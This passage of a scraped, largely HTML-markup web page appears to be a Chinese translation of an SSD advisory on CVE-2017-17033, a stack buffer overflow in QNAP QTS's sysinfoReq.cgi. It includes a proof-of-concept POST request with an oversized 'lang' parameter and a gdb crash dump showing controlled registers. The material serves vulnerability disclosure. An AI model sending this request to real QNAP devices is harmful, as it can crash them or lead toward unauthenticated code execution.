12px !important; line-height: 15px !important;\"> POST \/cgi-bin\/sysinfoReq.cgi HTTP\/1.1  Host: 192.168.1.131:8080  User-Agent: Mozilla\/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko\/20100101 Firefox\/53.0  Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8  Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  Connection: close  Upgrade-Insecure-Requests: 1  Content-Type: application\/x-www-form-urlencoded  Content-Length: 343  qpkg=pwnt&amp;lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXBBBBBBBBBBBBBBBBBB  BBBBBBBBBBBBBBBBBBBBBBYYYY<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25a755842548-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25a755842548-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25a755842548-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25a755842548-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25a755842548-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25a755842548-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25a755842548-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25a755842548-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25a755842548-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25a755842548-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25a755842548-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25a755842548-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25a755842548-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25a755842548-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25a755842548-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">cgi<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">bin<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">sysinfoReq<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">cgi <\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25a755842548-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">192.168.1.131<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">8080<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25a755842548-3\"><span class=\"crayon-v\">User<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Agent<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mozilla<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">Windows <\/span><span class=\"crayon-i\">NT<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10.0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">rv<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">53.0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">20100101<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Firefox<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">53.0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25a755842548-4\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xhtml<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">xml<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.9<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25a755842548-5\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">it<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">IT<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">it<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25a755842548-6\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25a755842548-7\"><span class=\"crayon-v\">Upgrade<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Insecure<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Requests<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25a755842548-8\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">application<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">www<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">urlencoded<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25a755842548-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">343<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25a755842548-10\"><span class=\"crayon-v\">qpkg<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">pwnt<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">lang<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25a755842548-11\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25a755842548-12\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25a755842548-13\"><span class=\"crayon-e\">AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAXXXXBBBBBBBBBBBBBBBBBB<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25a755842548-14\"><span class=\"crayon-v\">BBBBBBBBBBBBBBBBBBBBBBYYYY<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>\u4ea7\u751f\u4ee5\u4e0b\u5d29\u6e83\uff1a<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a383ee46f25c872105678\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> Program received signal SIGSEGV, Segmentation fault.  r0 0x8 8  r1 0x0 0  r2 0x1740 5952  r3 0x58585858 1482184792  r4 0x58585858 1482184792  r5 0xffffffff 4294967295  r6 0x0 0  r7 0x0 0  r8 0x4 4  r9 0x977008 9924616  r10 0x1 1  r11 0xbee346e4 3202565860  r12 0xbee33db8 3202563512  sp 0xbee34370 0xbee34370  lr 0xb6c53b84 3066379140  pc 0x1c87c 0x1c87c  cpsr 0x20000010 536870928  =&gt; 0x1c87c: ldr r3, [r4, r2]   0x1c880: cmp r3, #1   0x1c884: beq 0x1caa4  0x0001c87c in ?? ()  (gdb) x\/i $pc  =&gt; 0x1c87c: ldr r3, [r4, r2]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a383ee46f25c872105678-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a383ee46f25c872105678-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-1\"><span class=\"crayon-e\">Program <\/span><span class=\"crayon-e\">received <\/span><span class=\"crayon-e\">signal <\/span><span class=\"crayon-v\">SIGSEGV<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Segmentation <\/span><span class=\"crayon-v\">fault<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-2\"><span class=\"crayon-i\">r0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-3\"><span class=\"crayon-i\">r1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-4\"><span class=\"crayon-i\">r2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1740<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">5952<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-5\"><span class=\"crayon-i\">r3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x58585858<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1482184792<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-6\"><span class=\"crayon-i\">r4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x58585858<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1482184792<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-7\"><span class=\"crayon-i\">r5<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xffffffff<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4294967295<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-8\"><span class=\"crayon-i\">r6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-9\"><span class=\"crayon-i\">r7<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-10\"><span class=\"crayon-i\">r8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-11\"><span class=\"crayon-i\">r9<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x977008<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">9924616<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-12\"><span class=\"crayon-i\">r10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-13\"><span class=\"crayon-i\">r11<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbee346e4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3202565860<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-14\"><span class=\"crayon-i\">r12<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbee33db8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3202563512<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-15\"><span class=\"crayon-i\">sp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbee34370<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xbee34370<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-16\"><span class=\"crayon-i\">lr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0xb6c53b84<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3066379140<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-17\"><span class=\"crayon-i\">pc<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c87c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c87c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-18\"><span class=\"crayon-i\">cpsr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x20000010<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">536870928<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-19\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c87c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ldr <\/span><span class=\"crayon-v\">r3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">r4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-20\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c880<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cmp <\/span><span class=\"crayon-v\">r3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-p\">#1<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-21\"><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c884<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">beq<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1caa4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-22\"><span class=\"crayon-cn\">0x0001c87c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a383ee46f25c872105678-23\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">pc<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a383ee46f25c872105678-24\"><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0x1c87c<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ldr <\/span><span class=\"crayon-v\">r3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">r4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3587\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/12\/image005-207x300.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 18 Dec 2017 08:04:57 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86QNAP QTS\u7684\u4e00\u4e2a\u5185\u5b58\u635f\u574f\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u8be5\u6f0f\u6d1e\u4f1a\u9020\u6210QNAP QTS 4.3.x\u548c4.2.x\u7248\u672c\uff08\u5305\u62ec4.3.3.0299\uff09\u672a\u7ecf\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u3002 \u5a01\u8054\u901a\u79d1\u6280\uff08QNAP Systems, Inc\uff09\u4e13\u6ce8\u4e8e\u4e3a\u4f01\u4e1a\uff0c\u4e2d\u5c0f\u578b\u4f01\u4e1a\uff0cSOHO\u548c\u5bb6\u5ead\u7528\u6237\u63d0\u4f9b\u6587\u4ef6\u5171\u4eab\uff0c\u865a\u62df\u5316\uff0c\u5b58\u50a8\u7ba1\u7406\u548c\u76d1\u63a7\u5e94\u7528\u7684\u7f51\u7edc\u89e3\u51b3\u65b9\u6848\u3002 QNAP QTS\u662f\u6807\u51c6\u7684\u667a\u80fdNAS\u64cd\u4f5c\u7cfb\u7edf\uff0c\u652f\u6301\u6240\u6709\u6587\u4ef6\u5171\u4eab\uff0c\u5b58\u50a8\uff0c\u5907\u4efd\uff0c\u865a\u62df\u5316\u548c\u591a\u5a92\u4f53QNAP\u8bbe\u5907\u3002 \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u4f4d\u5b89\u5168\u7814\u7a76\u8005TRUEL IT\uff08@truel_it\uff09\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e \u5382\u5546\u54cd\u5e94 QNAP\u5df2\u88ab\u544a\u77e5\u8be5\u6f0f\u6d1e\uff0c\u5e76\u56de\u590d\uff1a\u201c\u6211\u4eec\u5df2\u7ecf\u786e\u8ba4\u8fd9\u4e2a\u95ee\u9898\u4e0e\u6700\u8fd1\u7684\u53e6\u4e00\u4efd\u62a5\u544a\u76f8\u540c\uff0c\u5e76\u5df2\u7ecf\u53d1\u5e03\u4e86CVE-2017-17033\u3002 \u5c3d\u7ba1\u8fd9\u4efd\u62a5\u544a\u662f\u91cd\u590d\u7684\uff0c\u4f46\u6211\u4eec\u4ecd\u7136\u4f1a\u5728\u5373\u5c06\u53d1\u5e03\u7684\u5b89\u5168\u516c\u544a\u4e2d\u5bf9\u4e24\u4f4d\u62a5\u9001\u8005\u8868\u793a\u611f\u8c22\u3002 \u540c\u65f6\uff0c\u5728\u5373\u5c06\u53d1\u5e03\u7684QTS 4.2.6\u548c4.3.3\u7248\u672c\u4e2d\u5c06\u4fee\u590d\u8be5\u6f0f\u6d1e\u3002\u201d CVE: CVE-2017-17033 \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u7531\u4e8e\u7f3a\u4e4f\u9002\u5f53\u7684\u8fb9\u754c\u68c0\u67e5\uff0c\u53ef\u4ee5\u901a\u8fc7\u7279\u5236\u7684HTTP\u8bf7\u6c42\u6ea2\u51fa\u5806\u6808\u7f13\u51b2\u533a\u5e76\u52ab\u6301\u63a7\u5236\u6d41\u4ee5\u5b9e\u73b0\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002 